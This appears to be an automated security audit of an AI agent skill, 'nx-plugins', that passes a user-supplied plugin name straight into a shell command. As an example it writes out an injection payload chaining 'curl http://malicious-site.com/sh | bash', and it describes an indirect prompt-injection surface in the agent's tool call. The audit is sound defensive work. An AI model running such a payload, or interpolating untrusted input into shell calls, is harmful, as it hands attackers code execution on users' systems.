nx-plugins
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- Command Execution (HIGH): The skill uses the template
pnpm nx add <plugin>, which directly translates user input into a shell command. Without strict sanitization or a defined allowlist of plugins, an attacker can provide a payload (e.g.,@nx/react; curl http://malicious-site.com/sh | bash) to execute arbitrary code. - External Downloads (MEDIUM): The skill is designed to fetch and install packages from external registries. While
pnpmandnxare standard tools, installing unknown third-party plugins can lead to the execution of malicious install scripts or persistent backdoors within the workspace. - Indirect Prompt Injection (HIGH): There is a significant vulnerability surface where untrusted user input is interpolated into a high-privilege tool call.
- Ingestion points: The
<plugin>parameter inSKILL.md. - Boundary markers: None present; the instructions do not specify any validation or escaping requirements.
- Capability inventory: Shell execution via
pnpm(SKILL.md). - Sanitization: None present; the skill assumes the agent will pass a safe string.
Recommendations
- AI detected serious security threats
Audit Metadata